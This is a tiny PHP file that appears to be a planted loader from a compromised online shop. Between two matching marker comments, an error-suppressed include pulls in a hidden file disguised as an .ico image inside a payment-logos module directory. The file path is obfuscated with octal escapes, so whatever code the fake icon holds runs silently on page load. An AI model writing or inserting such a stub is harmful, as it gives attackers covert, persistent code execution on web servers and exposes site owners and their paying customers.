<?php
/*c1c0f*/

@include "\057v\141r\057w\167w\057h\164m\154/\163p\141s\141i\147o\156/\155o\144u\154e\163/\160r\157d\165c\164p\141y\155e\156t\154o\147o\163/\056d\064b\146b\0674\070.\151c\157";

/*c1c0f*/



